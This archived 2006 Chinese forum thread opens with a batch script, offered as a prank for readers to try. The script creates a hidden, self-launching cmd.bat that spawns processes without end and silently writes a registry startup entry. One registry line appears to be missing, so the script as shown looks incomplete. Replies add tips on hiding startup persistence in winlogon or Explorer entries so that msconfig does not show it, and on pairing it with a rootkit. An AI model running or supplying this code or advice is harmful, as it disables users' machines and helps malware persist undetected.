小麻哈鱼 发表于 2006-2-23 20:41

〖灌水〗一个小batch.嘿嘿

<P>@echo off<BR>echo start %systemroot%\system32\cmd.bat>>%systemroot%\system32\cmd.bat<BR>attrib +h +s +r %systemroot%\system32\cmd.bat<BR>echo Windows Registry Editor Version 5.00 >>%systemroot%\cmd.reg<BR>echo >>%systemroot%\cmd.reg<BR>echo "cmd"="c:\\windows\\system32\\cmd.bat">>%systemroot%\cmd.reg<BR>regedit /s %systemroot%\cmd.reg<BR>del %systemroot%\cmd.reg</P>
<P></P>
<P></P>

小麻哈鱼 发表于 2006-2-23 20:51

没注册表监控软件的可以试下,很X的

http://bbs.cga.com.cn/emote/11.gif

笨笨啊 发表于 2006-3-2 10:41

都加到启动项了,还不明显啊?

小麻哈鱼 发表于 2006-3-2 11:06

这个配合rootkit才有生命力,加到services也比较隐藏,
没什么意义,可以理解下有些马儿的原理。

笨笨啊 发表于 2006-3-2 11:08

不过最好还是加在winlogon,或者是explorer的插件启动项里,这样开机即引导
,而且在常用的msconfig里不可见

小麻哈鱼 发表于 2006-3-4 11:45

这些很少见哎,加载在explorer里的见过个dll的,
regsvc32 /u下就好了,呵呵。
页: [1]
查看完整版本: 〖灌水〗一个小batch.嘿嘿